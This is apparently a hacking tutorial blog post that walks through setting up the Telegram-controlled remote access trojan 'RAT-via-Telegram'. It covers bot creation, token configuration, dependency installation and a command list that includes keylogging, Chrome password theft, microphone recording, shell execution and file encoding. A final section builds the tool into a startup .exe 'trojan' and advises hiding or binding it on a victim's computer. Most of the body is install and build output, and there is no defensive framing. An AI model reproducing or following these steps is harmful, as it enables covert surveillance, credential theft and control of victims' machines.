USE TELEGRAM TO HACK AND CONTROL YOUR WINDOWS 10 MACHINE

In this new era of bots, almost everywhere on the internet you talk to, you ask your queries in the web applications all are operated by bots. A bot is something which is operated by your commands on behalf of you. Many companies are nowadays using bots to provide online chat support to their customers, It is something like you say “hi” on chat support, you get “hello, how may I help you” in the reply. This is a great revolution for companies and organization and it helps them a lot in automatically resolving their client’s issue. But what about hackers? Don’t they take advantage of the bots for their selfish use? Well in this article will tell you on how telegram can be used to hack into computer and can be used as bots.

There are many Remote Administration tools (RATs) available in the market  but they commonly pose two problems :

  • First problem is that if you take the control of a computer through some trojan or malware hundred of miles away , in order to have some fun with that machine or to control, you have to configure a Command and Control Server, so that the C & C server give the required commands to the victim machine.
  • Second problem is the communication between victim machine and C & C server is not encrypted and thus make communication insecure.

So in order to overcome these problems , some researchers use Telegram bots as Remote Administration tool and it overcome these two problem as :

  • In order to control the victim’s computer , you don’t need to do any port forwarding or host any server as these telegram bots fulfill this problem. The Telegram Bot API connects the victim’s computer the telegram server through which attacker can easily communicate with his victim .
  • The whole communication is encrypted through HTTPS protocol and helps to prevent any Man-In-The-Middle Attack.
  • Best thing is attacker can use his/her mobile telegram to control the victim machine or bot.

So let’s dive into the tool and see how it works :

ENVIRONMENT SETTINGS :

  • We strictly recommend you to use Python 3.7. The upper and below 3.7 version are not supported .
  • OS : Windows 7,8 and 10 ( Windows10 Recommended ). Not any other operating system is supported .
  • Only 64-bit windows architecture is supported .
  • Make sure you have good internet connection

INSTALLATION STEPS:

CREATE YOUR OWN TELEGRAM BOT

  • For creating the Telegram Bot, download the official app of Telegram through Google Play store .
  • After downloading, navigate to the search bar of Telegram app and type BotFather .
  • After the window of BotFather is opened , click start and type /newbot .
newbot
newbot
  • Then it will ask you to choose a name for your bot. For instance , let us take the name as test123 .
choose a name for your bot
choose a name for your bot
  • It will now ask you to choose a username for your bot like here we will choose the username as rsu890_bot .
choose the username
choose the username
  • After performing all the above steps, it will allot you a token ID which something like ‘xx:xx’ . Copy this token ID and save it in protected place as we will be using this token ID to configure the bot.
Copy this token ID
Copy this token ID

INSTALLATION AND USAGE OF THE TOOL

paste the token ID
paste the token ID
  • Now paste the token ID of your Bot where your search takes you first i.e. token = ‘xx:xx’ to token = ‘YOUR_TOKEN_ID’ .
  • Press the Find Next and replace the ‘RVT_TOKEN’ to ‘YOUR_TOKEN_ID’ and token = os.environ[‘RVT_TOKEN’] to token = os.environ[‘YOUR_TOKEN_ID’] and save the file .
RVT_TOKEN
RVT_TOKEN
  • Now download the two python libraries from the link given below PyAudio and PyHook from the given link below :

https://www.lfd.uci.edu/~gohlke/pythonlibs/

  • Download pyHook1.5.1cp37cp37mwin_amd64.whl and pyHook1.5.1cp37cp37mwin_amd64.whl .
  • After downloading the above two libraries install them by opening command prompt and typing the the command pip install

pyHook‑1.5.1‑cp37‑cp37m‑win_amd64.whl and pip install pyHook‑1.5.1‑cp37‑cp37m‑win_amd64.whl .

download the two python libraries
download the two python libraries
  • After downloading the above two libraries , copy the path of downloaded repository, open the command prompt and type cd <path_of_repository> .
  • Now type the command pip -r requirements.txt .
C:\Users\webimprints\rsu>cd C:\Users\webimprints\rsu\RAT-via-Telegram-master
C:\Users\webimprints\rsu\RAT-via-Telegram-master>pip install -r requirements.txt
Requirement already satisfied: telepot in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from -r requirements.txt (line 1)) (12.7)Requirement already satisfied: requests in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from -r requirements.txt (line 2)) (2.23.0)
Requirement already satisfied: image in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from -r requirements.txt (line 3)) (1.5.28)
Requirement already satisfied: winshell in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from -r requirements.txt (line 4)) (0.6)
Requirement already satisfied: tendo in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from -r requirements.txt (line 5)) (0.2.15)
Requirement already satisfied: pypiwin32 in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from -r requirements.txt (line 6)) (223)
Requirement already satisfied: pyinstaller in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from -r requirements.txt (line 7)) (3.6)
Requirement already satisfied: psutil in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from -r requirements.txt (line 8)) (5.7.0)
Requirement already satisfied: pillow in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from -r requirements.txt (line 9)) (7.1.1)
Requirement already satisfied: opencv-python in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from -r requirements.txt (line 10)) (4.2.0.34)
Requirement already satisfied: console-tools in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from -r requirements.txt (line 11)) (0.2.1)
Requirement already satisfied: urllib3>=1.9.1 in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from telepot->-r requirements.txt (line 1)) (1.25.8)
Requirement already satisfied: aiohttp>=3.0.0 in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from telepot->-r requirements.txt (line 1)) (3.6.2)
Requirement already satisfied: certifi>=2017.4.17 in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from requests->-r requirements.txt (line 2)) (2020.4.5.1)
Requirement already satisfied: chardet<4,>=3.0.2 in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from requests->-r requirements.txt (line 2)) (3.0.4)
Requirement already satisfied: idna<3,>=2.5 in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from requests->-r requirements.txt (line 2)) (2.9)
Requirement already satisfied: django in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from image->-r requirements.txt (line 3)) (3.0.5)
Requirement already satisfied: six>=1.7.2 in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from tendo->-r requirements.txt (line 5)) (1.14.0)
Requirement already satisfied: pbr in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from tendo->-r requirements.txt (line 5)) (5.4.4)
Requirement already satisfied: setuptools in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from tendo->-r requirements.txt (line 5)) (40.8.0)
Requirement already satisfied: pip in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from tendo->-r requirements.txt (line 5)) (20.0.2)
Requirement already satisfied: pywin32>=223 in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from pypiwin32->-r requirements.txt (line 6)) (227)
Requirement already satisfied: pefile>=2017.8.1 in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from pyinstaller->-r requirements.txt (line 7)) (2019.4.18)
Requirement already satisfied: pywin32-ctypes>=0.2.0 in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from pyinstaller->-r requirements.txt (line 7)) (0.2.0)
Requirement already satisfied: altgraph in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from pyinstaller->-r requirements.txt (line 7)) (0.17)
Requirement already satisfied: numpy>=1.14.5 in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from opencv-python->-r requirements.txt (line 10)) (1.18.2)
Requirement already satisfied: termcolor in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from console-tools->-r requirements.txt (line 11)) (1.1.0)
Requirement already satisfied: colorama in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from console-tools->-r requirements.txt (line 11)) (0.4.3)
Requirement already satisfied: yarl<2.0,>=1.0 in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from aiohttp>=3.0.0->telepot->-r requirements.txt (line 1)) (1.4.2)
Requirement already satisfied: multidict<5.0,>=4.5 in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from aiohttp>=3.0.0->telepot->-r requirements.txt (line 1)) (4.7.5)
Requirement already satisfied: async-timeout<4.0,>=3.0 in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from aiohttp>=3.0.0->telepot->-r requirements.txt (line 1)) (3.0.1)
Requirement already satisfied: attrs>=17.3.0 in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from aiohttp>=3.0.0->telepot->-r requirements.txt (line 1)) (19.3.0)
Requirement already satisfied: sqlparse>=0.2.2 in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from django->image->-r requirements.txt (line 3)) (0.3.1)
Requirement already satisfied: asgiref~=3.2 in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from django->image->-r requirements.txt (line 3)) (3.2.7)
Requirement already satisfied: pytz in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from django->image->-r requirements.txt (line 3)) (2019.3)
Requirement already satisfied: future in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from pefile>=2017.8.1->pyinstaller->-r requirements.txt (line 7)) (0.18.2)
  • Now your tool is ready to go, you can use use it by typing the command python RATAttack.py .
tool is ready to go
tool is ready to go
  • Now you can open you telegram app in your mobile phone and search for your bot username for example rsu890_bot and type the command in the chatbox /help.

It will show you the following commands :

arp - display arp table
capture_pc - screenshot PC
cmd_exec - execute shell command
cp - copy files
cd - change current directory
delete - delete a file/folder
download - download file from target
decode_all - decode ALL encoded local files
dns - display DNS Cache
encode_all - encode ALL local files
freeze_keyboard - enable keyboard freeze
unfreeze_keyboard - disable keyboard freeze
get_chrome - Get Google Chrome's login/passwords
hear - record microphone
ip_info - via ipinfo.io
keylogs - get keylogs
ls - list contents of current or specified directory
msg_box - display message box with text
mv - move files
pc_info - PC information
ping - makes sure target is up
play - plays a youtube video
proxy - opens a proxy server
pwd - show current directory
python_exec - interpret python
reboot - reboot computer
run - run a file
schedule - schedule a command to run at specific time
self_destruct - destroy all traces
shutdown - shutdown computer
tasklist - display services and processes running
to - select targets by it's name
update - update executable
wallpaper - change wallpaper

NOW LET’S HAVE SOME FUN WITH THE TARGETED MACHINE :

  • Search for your required bot in the telegram app and type /pc_info to get the information about the victim’s machine.
  • You can see and alter the windows file of the victim’s systems by typing the command /cd C:\Windows\system32
/cd C:\Windows\system32
/cd C:\Windows\system32
  • You can see the DNS records of the victim’s machine by typing the /dns.
 see the DNS records of the victim’s machine
see the DNS records of the victim’s machine
  • If you want that target machine should communicate with you only , replace the CHAT_ID in the RATAttack.py as :
CHAT_ID in the RATAttack.py
CHAT_ID in the RATAttack.py
  • Similarly , you can play a youtube video by giving the command /play <VIDEO_ID>
  • You can shutdown or restart the victim’s computer by

/shutdown or /restart respectively

You can do many more tasks by reading the /help manual !!!

USING THE TOOL AS A TROJAN :

Yes we can use this tool as a trojan. As we all know that the easiest path to deliver malware to someone’s computer is through packing the malware into .exe and send it to the victim . Here we will do the same thing by creating an .exe which will always run at the startup. To make .exe file , follow the steps as:

  • Open the compile.py with notepad in the downloaded folder .
  • Comment the statement download_and _install_lfd_uci_wheel(‘pyAudio’) and download_and _install_lfd_uci_wheel(‘pyHook’) to #download_and _install_lfd_uci_wheel(‘pyAudio’) and #download_and _install_lfd_uci_wheel(‘pyHook’) respectively and save the file .
  • Now again open the terminal and move to the RATAttack folder by typing the command cd <path_of_RATAttack>.
  • Now run the command python compile.py to run and build the .exe file
C:\Users\webimprints\rsu\Desktop\RAT-via-Telegram-master>python compile.py
Now going to install dependencies and compile the rat, make sure you have prepped RATAttack.py beforehand
Press ENTER to resumeRequirement already satisfied: telepot in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from -r requirements.txt (line 1)) (12.7)
Requirement already satisfied: requests in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from -r requirements.txt (line 2)) (2.23.0)
Requirement already satisfied: image in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from -r requirements.txt (line 3)) (1.5.28)
Requirement already satisfied: winshell in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from -r requirements.txt (line 4)) (0.6)
Requirement already satisfied: tendo in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from -r requirements.txt (line 5)) (0.2.15)
Requirement already satisfied: pypiwin32 in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from -r requirements.txt (line 6)) (223)
Requirement already satisfied: pyinstaller in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from -r requirements.txt (line 7)) (3.6)
Requirement already satisfied: psutil in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from -r requirements.txt (line 8)) (5.7.0)
Requirement already satisfied: pillow in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from -r requirements.txt (line 9)) (7.1.1)
Requirement already satisfied: opencv-python in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from -r requirements.txt (line 10)) (4.2.0.34)
Requirement already satisfied: console-tools in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from -r requirements.txt (line 11)) (0.2.1)
Requirement already satisfied: urllib3>=1.9.1 in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from telepot->-r requirements.txt (line 1)) (1.25.8)
Requirement already satisfied: aiohttp>=3.0.0 in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from telepot->-r requirements.txt (line 1)) (3.6.2)
Requirement already satisfied: idna<3,>=2.5 in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from requests->-r requirements.txt (line 2)) (2.9)
Requirement already satisfied: certifi>=2017.4.17 in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from requests->-r requirements.txt (line 2)) (2020.4.5.1)
Requirement already satisfied: chardet<4,>=3.0.2 in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from requests->-r requirements.txt (line 2)) (3.0.4)
Requirement already satisfied: django in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from image->-r requirements.txt (line 3)) (3.0.5)
Requirement already satisfied: setuptools in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from tendo->-r requirements.txt (line 5)) (40.8.0)
Requirement already satisfied: pbr in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from tendo->-r requirements.txt (line 5)) (5.4.4)
Requirement already satisfied: pip in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from tendo->-r requirements.txt (line 5)) (20.0.2)
Requirement already satisfied: six>=1.7.2 in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from tendo->-r requirements.txt (line 5)) (1.14.0)
Requirement already satisfied: pywin32>=223 in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from pypiwin32->-r requirements.txt (line 6)) (227)
Requirement already satisfied: pywin32-ctypes>=0.2.0 in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from pyinstaller->-r requirements.txt (line 7)) (0.2.0)
Requirement already satisfied: pefile>=2017.8.1 in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from pyinstaller->-r requirements.txt (line 7)) (2019.4.18)
Requirement already satisfied: altgraph in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from pyinstaller->-r requirements.txt (line 7)) (0.17)
Requirement already satisfied: numpy>=1.14.5 in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from opencv-python->-r requirements.txt (line 10)) (1.18.2)
Requirement already satisfied: termcolor in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from console-tools->-r requirements.txt (line 11)) (1.1.0)
Requirement already satisfied: colorama in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from console-tools->-r requirements.txt (line 11)) (0.4.3)
Requirement already satisfied: attrs>=17.3.0 in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from aiohttp>=3.0.0->telepot->-r requirements.txt (line 1)) (19.3.0)
Requirement already satisfied: yarl<2.0,>=1.0 in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from aiohttp>=3.0.0->telepot->-r requirements.txt (line 1)) (1.4.2)
Requirement already satisfied: async-timeout<4.0,>=3.0 in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from aiohttp>=3.0.0->telepot->-r requirements.txt (line 1)) (3.0.1)
Requirement already satisfied: multidict<5.0,>=4.5 in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from aiohttp>=3.0.0->telepot->-r requirements.txt (line 1)) (4.7.5)
Requirement already satisfied: pytz in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from django->image->-r requirements.txt (line 3)) (2019.3)
Requirement already satisfied: asgiref~=3.2 in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from django->image->-r requirements.txt (line 3)) (3.2.7)
Requirement already satisfied: sqlparse>=0.2.2 in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from django->image->-r requirements.txt (line 3)) (0.3.1)
Requirement already satisfied: future in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from pefile>=2017.8.1->pyinstaller->-r requirements.txt (line 7)) (0.18.2)
'upx' is not recognized as an internal or external command,
operable program or batch file.
Did the install run correctly?
Press ENTER to build
139 INFO: PyInstaller: 3.6
143 INFO: Python: 3.7.4
143 INFO: Platform: Windows-10-10.0.18362-SP0
143 INFO: wrote C:\Users\webimprints\rsu\Desktop\RAT-via-Telegram-master\RATAttack.spec
146 INFO: UPX is not available.
146 INFO: Removing temporary files and cleaning cache in C:\Users\webimprints\rsu\AppData\Roaming\pyinstaller
178 INFO: Extending PYTHONPATH with paths
['C:\Users\webimprints\rsu\Desktop\RAT-via-Telegram-master',
'C:\Users\webimprints\rsu\Desktop\RAT-via-Telegram-master']
182 INFO: checking Analysis
182 INFO: Building Analysis because Analysis-00.toc is non existent
182 INFO: Initializing module dependency graph…
189 INFO: Caching module graph hooks…
209 INFO: Analyzing base_library.zip …
8635 INFO: Caching module dependency graph…
8807 INFO: running Analysis Analysis-00.toc
8823 INFO: Adding Microsoft.Windows.Common-Controls to dependent assemblies of final executable
required by c:\users\webimprints\rsu\appdata\local\programs\python\python37\python.exe
8965 INFO: Analyzing C:\Users\webimprints\rsu\Desktop\RAT-via-Telegram-master\RATAttack.py
11708 INFO: Processing pre-find module path hook distutils
11708 INFO: distutils: retargeting to non-venv dir 'c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib'
14101 INFO: Processing pre-find module path hook site
14105 INFO: site: retargeting to fake-dir 'c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages\PyInstaller\fake-modules'
17175 INFO: Processing pre-safe import module hook setuptools.extern.six.moves
24228 INFO: Processing pre-safe import module hook win32com
26225 INFO: Processing pre-safe import module hook urllib3.packages.six.moves
29213 INFO: Processing module hooks…
29213 INFO: Loading module hook "hook-certifi.py"…
29213 INFO: Loading module hook "hook-cv2.py"…
29213 INFO: Loading module hook "hook-distutils.py"…
29228 INFO: Loading module hook "hook-encodings.py"…
29369 INFO: Loading module hook "hook-lib2to3.py"…
29384 INFO: Loading module hook "hook-numpy.core.py"…
29900 INFO: Loading module hook "hook-numpy.py"…
29900 INFO: Loading module hook "hook-PIL.Image.py"…
31044 INFO: Loading module hook "hook-PIL.py"…
31047 INFO: Import to be excluded not found: 'FixTk'
31051 INFO: Import to be excluded not found: 'PyQt4'
31051 INFO: Import to be excluded not found: 'PySide'
31051 INFO: Excluding import 'PyQt5'
31055 INFO: Removing import of PyQt5 from module PIL.ImageQt
31059 INFO: Excluding import 'tkinter'
31063 INFO: Removing import of tkinter from module PIL.ImageTk
31067 INFO: Loading module hook "hook-PIL.SpiderImagePlugin.py"…
31071 INFO: Import to be excluded not found: 'FixTk'
31074 INFO: Excluding import 'tkinter'
31083 INFO: Loading module hook "hook-pkg_resources.py"…
32079 INFO: Excluding import 'main'
32083 INFO: Removing import of main from module pkg_resources
32083 INFO: Loading module hook "hook-pydoc.py"…
32086 INFO: Loading module hook "hook-pythoncom.py"…
32454 INFO: Loading module hook "hook-pywintypes.py"…
32817 INFO: Loading module hook "hook-setuptools.py"…
33720 INFO: Loading module hook "hook-sqlite3.py"…
33861 INFO: Loading module hook "hook-sysconfig.py"…
33861 INFO: Loading module hook "hook-win32com.py"…
34049 INFO: Loading module hook "hook-xml.dom.domreg.py"…
34049 INFO: Loading module hook "hook-xml.etree.cElementTree.py"…
34049 INFO: Loading module hook "hook-xml.py"…
34049 INFO: Loading module hook "hook-_tkinter.py"…
34377 INFO: checking Tree
34377 INFO: Building Tree because Tree-00.toc is non existent
34377 INFO: Building Tree Tree-00.toc
34517 INFO: checking Tree
34517 INFO: Building Tree because Tree-01.toc is non existent
34517 INFO: Building Tree Tree-01.toc
34673 INFO: Looking for ctypes DLLs
34829 INFO: Analyzing run-time hooks …
34845 INFO: Including run-time hook 'pyi_rth_pkgres.py'
34845 INFO: Including run-time hook 'pyi_rth_win32comgenpy.py'
34861 INFO: Including run-time hook 'pyi_rth_multiprocessing.py'
34877 INFO: Including run-time hook 'pyi_rth_certifi.py'
34907 INFO: Looking for dynamic libraries
37430 INFO: Looking for eggs
37430 INFO: Using Python library c:\users\webimprints\rsu\appdata\local\programs\python\python37\python37.dll
37445 INFO: Found binding redirects:
[]
37461 INFO: Warnings written to C:\Users\webimprints\rsu\Desktop\RAT-via-Telegram-master\build\RATAttack\warn-RATAttack.txt
37804 INFO: Graph cross-reference written to C:\Users\webimprints\rsu\Desktop\RAT-via-Telegram-master\build\RATAttack\xref-RATAttack.html
37867 INFO: checking PYZ
37867 INFO: Building PYZ because PYZ-00.toc is non existent
37867 INFO: Building PYZ (ZlibArchive) C:\Users\webimprints\rsu\Desktop\RAT-via-Telegram-master\build\RATAttack\PYZ-00.pyz
40633 INFO: Building PYZ (ZlibArchive) C:\Users\webimprints\rsu\Desktop\RAT-via-Telegram-master\build\RATAttack\PYZ-00.pyz completed successfully.
40712 INFO: checking PKG
40712 INFO: Building PKG because PKG-00.toc is non existent
40712 INFO: Building PKG (CArchive) PKG-00.pkg
60100 INFO: Building PKG (CArchive) PKG-00.pkg completed successfully.
441806 INFO: Bootloader c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages\PyInstaller\bootloader\Windows-64bit\run.exe
441806 INFO: checking EXE
441822 INFO: Building EXE because EXE-00.toc is non existent
441837 INFO: Building EXE from EXE-00.toc
441837 INFO: Appending archive to EXE C:\Users\webimprints\rsu\Desktop\RAT-via-Telegram-master\dist\RATAttack.exe
442041 INFO: Building EXE from EXE-00.toc completed successfully.
Script has finished
C:\Users\webimprints\rsu\Desktop\RAT-via-Telegram-master>cd C:\Users\webimprints\rsu\Desktop\RAT-via-Telegram-master
  • As you can see, that compilation is successful , now your .exe file is build and you can see this file by going into \dist and run this file in the same way as you ran the tool in above steps . 
  • If you have access to victim’s computer for a while you can hide this .exe file and keep it running the background or you can bind this .exe file and do some scripting to hide in the victim’s computer .
.exe file and keep it running the background
.exe file and keep it running the background

CONCLUSION :

The whole tool is written in python which is provides many functions in the tool. The concept behind this tool is much better than any other malware attacking and it helps the attacker to easily communicate with the victim’s system with less technical knowledge required .